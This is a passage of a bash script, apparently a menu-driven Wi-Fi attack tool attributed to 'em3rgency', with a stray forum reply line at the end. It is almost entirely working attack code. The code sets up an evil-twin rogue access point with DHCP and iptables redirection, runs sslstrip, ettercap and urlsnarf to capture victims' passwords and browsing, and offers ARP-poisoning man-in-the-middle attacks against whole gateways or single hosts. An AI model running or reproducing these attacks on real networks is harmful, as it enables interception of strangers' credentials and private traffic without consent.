echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
clear
mkdir -p /root/$SESSION
clear

echo $BLUE"               Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
mkdir -p "/var/run/dhcpd"
echo "authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;
range 10.0.0.30 10.0.0.60;
}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
echo $BLUE"                     Configuring and Starting $ESSID...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -P -C 60 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo "                          Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo "                   Setting up DHCP to work with EVIL TWIN AP...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
echo "               Starting SSLstrip to enumerate user credentials...."
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap
echo "                 Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo "            Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

#SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"     ####################################################################"
echo $RED"     [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"     [                                                                  ]"
echo $RED"     [    Press Y then ENTERKEY to close kill and clean up the script   ]"
echo $RED"     [                                                                  ]"
echo $RED"     [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"     ####################################################################"
echo $STAND""
echo ""
read WISH

# Kill all
if [ $WISH = "y" ] ; then
echo
echo $BLUE"                           Cleaning up your mess"
echo ''
sleep 2

kill ${fakeapid}
kill ${dhcpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${urlsnarfid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
echo ""
echo ""
echo $RED"             [+][+][+]     Everything is now cleaned up    [+][+][+]"
echo $RED"             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
echo $RED"             [+][+][+]          Coded by em3rgency         [+][+][+]"$STAND
sleep 5

fi

sleep 3
clear
./911_AP.sh
else

# Credits to N1t0g3n for the base to this section. Thanks bro
if [ $menuoption = "4" ]; then
clear
echo ""
echo ""
echo $BLUE"                  Finding wireless and ethernet interfaces."$STAND
sleep 3
echo ""
ifconfig -a | cut -d " " -f1 | sed '/^$/d' | egrep -v 'lo|vm'
echo ""
echo ""
echo "Please type the name of your wireless interface (wlan0): "
read WIFACE
sleep 2
echo ""
echo ""
echo "Please type the name of your ethernet interface (eth0): "
read ETH0
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION

mkdir -p /root/$SESSION
clear
echo ""
echo ""
clear
echo $RED"              **************************************************";
echo $RED"              *    1.  Attack entire Gateway through LAN       *";
echo $RED"              *    2.  Attack entire Gateway through Wireless  *";
echo $RED"              *    3.  Attack single host through LAN          *";
echo $RED"              *    4.  Attack single host through Wireless     *";
echo $RED"              *    5.  Return to Main Menu                     *";
echo $RED"              **************************************************";
echo $STAND""
echo ""
echo $BLUE"                           Select Menu Option: "
read menuoption
if [ $menuoption = "1" ]; then
echo
echo
echo "                This should be your Gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your Gateway in below: "$STAND
read GATEWAY
echo $BLUE"                         Starting attack on Gateway"
echo ""
echo ""
echo "                   Passwords will show up in ettercap window"
sleep 3
echo "1" > /proc/sys/net/ipv4/ip_forward

#  PORT redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf  -i $ETH0 &
sleep 2

# Ettercap
xterm -bg blue -fg white -geometry 80x7-0+366 -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $ETH0 -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "2" ]; then
#This will allow you to forward packets from the router
echo $BLUE"              This should be your gateway from what I see: "$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $BLUE"Please type the IP of your gateway: "$STAND
read GATEWAY
echo $BLUE"                      Starting attack on gateway"
echo ""
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Etterap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "3" ]; then
#This will allow you to forward packets from the router
echo ""
echo ""
echo $BLUE"              This should be your gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY3
echo ""
echo ""
echo "Please type the IP of the target host: "
read HOST3
echo ""
echo $BLUE"                      Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $ETH0 &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "4" ]; then
echo ""
echo ""
echo $BLUE"This should be your Gateway from what I see: "
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY4
echo ""
echo "Please type the IP of the target host: "
read HOST4
echo ""
echo $BLUE"                     Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log  -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
clear

echo $RED"                Invalid option, you must choose 1,2,3,4 or 5.."
sleep 2
echo $BLUE"                          Re-Launching Script..."
./911_AP.sh

fi
fi
fi
fi
if [ $menuoption = "5" ]; then
./911_AP.sh
fi
else

# A script to quickly tell whose on your network in real time.
if [ $menuoption = "5" ]; then
clear
echo $BLUE"           This will show all The clients connected to The network"
echo ""
sleep 3
clear
echo
echo
echo $STAND"Please type the name of your network interface Example: eth0 "
read IFACE;
echo ""
echo ""
echo "               This should be your gateway from what I see: "
route -n -A inet | grep UG
sleep 1
echo ""
echo ""
echo $STAND"Please type in the IP address of your gateway"
read GATEWAY;
sleep 2
clear
echo ""
echo ""
echo ""
echo $BLUE"                   Press CTRL C to stop close netdiscover"
echo ""
echo ""
echo $RED"    ####################################################################"
echo $RED"    [           em3rgency's Netdiscover script is now running          ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"

sudo xterm -bg blue -fg white -e netdiscover -i $IFACE -r $GATEWAY/24
read ENTERKEY
clear
./911_AP.sh

else
if [ $menuoption = "6" ]; then
exit
fi
fi
fi
fi
fi
fi
Absolutely LOVE your answer lol